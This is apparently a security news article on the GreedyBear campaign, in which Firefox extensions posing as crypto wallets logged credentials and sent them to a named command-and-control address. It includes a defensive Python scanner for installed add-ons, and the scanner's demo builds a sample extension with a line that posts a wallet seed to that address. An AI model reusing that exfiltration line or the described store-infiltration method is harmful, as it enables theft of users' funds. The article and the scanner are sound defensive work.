GreedyBear Strikes: $1 Million Stolen Through Malicious Firefox Extensions

How a Sophisticated Cybercrime Campaign Infiltrated the Mozilla Add-ons Store

A large-scale cyberattack known as GreedyBear has been uncovered, targeting Firefox users with more than 150 malicious browser extensions. According to security researchers from Koi Security, this operation stole an estimated $1 million in cryptocurrency from unsuspecting victims. By impersonating legitimate wallet tools from well-known platforms such as MetaMask, TronLink, and Rabby, the attackers managed to bypass Mozilla’s security measures and gain the trust of thousands of users.

The campaign’s strategy was both methodical and deceptive. Initially, the extensions were uploaded in a harmless form to pass Firefox’s review process. Over time, the attackers boosted their credibility with fake positive reviews before replacing the original branding with new names and logos, injecting malicious code into the software. This code functioned as a keylogger, capturing sensitive wallet credentials directly from form fields and pop-up interfaces, then sending them to a remote server controlled by the attackers.

Beyond the browser store infiltration, the group also leveraged Russian-speaking pirated software websites to distribute 500 distinct malware executables, ranging from trojans and info-stealers like LummaStealer to full-blown ransomware. Some fake sites even pretended to be official services from Trezor, Jupiter Wallet, or wallet recovery platforms, further tricking users into giving up their private keys.

Investigators linked all these malicious websites and extensions to a single IP address, 185.208.156.66, serving as the command-and-control hub for GreedyBear. Although Mozilla has since removed the infected extensions, experts warn that the attackers’ methods highlight how AI-generated code is helping cybercriminals scale operations, diversify attacks, and evade detection faster than ever before.
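As an added defensive example (not code from the report, Koi Security, or Mozilla), the script below inspects the packed add-ons in a Firefox profile without running them: it searches each .xpi for the C2 address named above and flags add-ons whose manifest requests the permission set a credential-harvesting wallet impostor needs. The `<profile>/extensions/*.xpi` layout, the permission threshold, and the two sample add-ons it builds are assumptions constructed for the demonstration.

```python
import json
import tempfile
import zipfile
from pathlib import Path

# Indicator from the report: the single C2 address behind the extensions and sites.
GREEDYBEAR_C2 = "185.208.156.66"
# Permissions that let an add-on read any page and phone home (assumed threshold ">= 3").
RISKY_PERMS = {"<all_urls>", "webRequest", "tabs", "storage"}


def scan_xpi(xpi_path, indicators=(GREEDYBEAR_C2,)):
    """Inspect one Firefox .xpi (a zip) without running it; returns a report dict."""
    hits, perms, name = [], [], Path(xpi_path).name
    with zipfile.ZipFile(xpi_path) as z:
        if "manifest.json" in z.namelist():
            m = json.loads(z.read("manifest.json"))
            name = m.get("name", name)
            perms = list(m.get("permissions", [])) + list(m.get("host_permissions", []))
        for member in z.namelist():  # search scripts and markup for indicator strings
            if member.endswith((".js", ".json", ".html")):
                data = z.read(member)
                hits += [(member, i) for i in indicators if i.encode() in data]
    risky = sorted(RISKY_PERMS.intersection(perms))
    return {"name": name, "risky_permissions": risky, "hits": hits,
            "flag": bool(hits) or len(risky) >= 3}


def scan_profile(profile_dir):
    """Scan every packed add-on under <profile>/extensions/ (assumed Firefox layout)."""
    return [scan_xpi(p) for p in sorted(Path(profile_dir, "extensions").glob("*.xpi"))]


def build_sample_xpi(path, name, perms, script):
    """Write a constructed .xpi for offline testing; not a real add-on."""
    with zipfile.ZipFile(path, "w") as z:
        z.writestr("manifest.json", json.dumps({"manifest_version": 2, "name": name,
                                                "version": "1.0", "permissions": perms}))
        z.writestr("background.js", script)


def demo():
    """Constructed profile: one wallet impostor talking to the C2, one benign theme."""
    prof = Path(tempfile.mkdtemp())
    (prof / "extensions").mkdir()
    build_sample_xpi(prof / "extensions/bad@example.xpi", "Wallet Helper (sample)", sorted(RISKY_PERMS),
                     'fetch("http://185.208.156.66/collect", {method: "POST", body: seed});')
    build_sample_xpi(prof / "extensions/ok@example.xpi", "Theme (sample)", ["theme"], "console.log(1);")
    return scan_profile(prof)
```

Point `scan_profile` at a real profile directory to check installed add-ons; a hit on the indicator or a full risky permission set is a reason to remove the add-on and rotate any wallet credentials entered while it was installed.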

This is not the first time Mozilla’s store has been breached on a large scale. Just last month, more than 40 fake wallet extensions mimicking brands like Coinbase, Trust Wallet, Phantom, Exodus, and Keplr were discovered. Despite Mozilla deploying a crypto-drainer detection system in June 2025, GreedyBear’s success shows that the threat is far from eliminated.

Koi Security also detected early signs of the group moving into Google’s Chrome Web Store, where a malicious extension called “Filecoin Wallet” was already using the same theft logic and C2 infrastructure. Security experts urge users to verify wallet extensions only through official project websites and remain vigilant about add-on publishers and reviews.

What Undercode Says:

GreedyBear is a textbook case of strategic cybercrime evolution, blending old-school social engineering with modern AI-powered automation. The group’s phased infiltration approach—uploading benign versions, collecting fake reviews, then swapping in weaponized code—demonstrates a deep understanding of browser store weaknesses. This patience-driven method ensures maximum reach before triggering red flags.

The integration of AI-generated code into malicious extensions is particularly alarming. AI allows attackers to quickly adapt payloads, making detection systems obsolete within weeks. Furthermore, the use of a centralized IP-based C2 hub for both browser and web-based attacks shows the campaign’s tight operational control, minimizing resource waste while maximizing damage.

What sets GreedyBear apart from typical extension scams is its multi-layer distribution strategy. By targeting browser extensions and pirated software simultaneously, the attackers widened their victim pool. The inclusion of multiple malware strains—ranging from LummaStealer to ransomware—suggests a diversified monetization model, where stolen data is either sold, ransomed, or directly exploited.

The connection to Russian-speaking piracy portals also indicates that the group likely taps into existing cybercriminal ecosystems for traffic and malware hosting. These networks often trade in bulk installation services, meaning GreedyBear might have simply outsourced parts of its campaign to maximize efficiency.

From a defensive perspective, Mozilla’s current system for detecting crypto-drainer add-ons appears reactive rather than proactive. Despite implementing a detection tool in June 2025, the fact that GreedyBear slipped through means that attackers are already shaping their code to evade that specific filter. The AI elements detected in their code reinforce this concern: once AI becomes a standard tool for cybercriminals, malware evolution cycles will outpace security patch cycles.

The reported expansion into the Chrome Web Store underscores the cross-platform nature of modern browser threats. Since Chrome commands a far larger market share than Firefox, a successful infiltration could multiply the victim count exponentially. This makes Chrome’s security protocols a critical testing ground for whether current review processes can handle AI-enhanced malware tactics.

GreedyBear also illustrates a worrying trend: cybercriminals no longer need zero-day exploits to cause mass damage. Exploiting human trust in official marketplaces is often enough. Once an extension is seen on a reputable store, most users skip deep vetting, relying solely on reviews—which can be faked with ease.

This entire incident reinforces the urgent need for:

Continuous AI-driven threat monitoring on browser stores

Mandatory multi-vendor verification for high-risk categories like crypto wallets

Improved transparency on extension ownership changes and code updates

Without these measures, we are likely to see more GreedyBears, each faster and more destructive than the last.

🔍 Fact Checker Results

✅ Over 150 malicious extensions linked to the GreedyBear campaign were removed from Mozilla’s store

✅ Estimated theft exceeded $1 million in cryptocurrency

✅ AI-generated code artifacts were confirmed in malicious extensions

📊 Prediction

GreedyBear’s tactics will likely inspire copycat campaigns that combine browser-based attacks with parallel malware distribution channels. Expect to see a rise in multi-platform crypto-drainer operations targeting both Firefox and Chrome users within the next six months. As AI continues to reduce the time needed to modify malicious payloads, browser security teams will face an arms race they are currently ill-equipped to win.


References:

Reported By: www.bleepingcomputer.com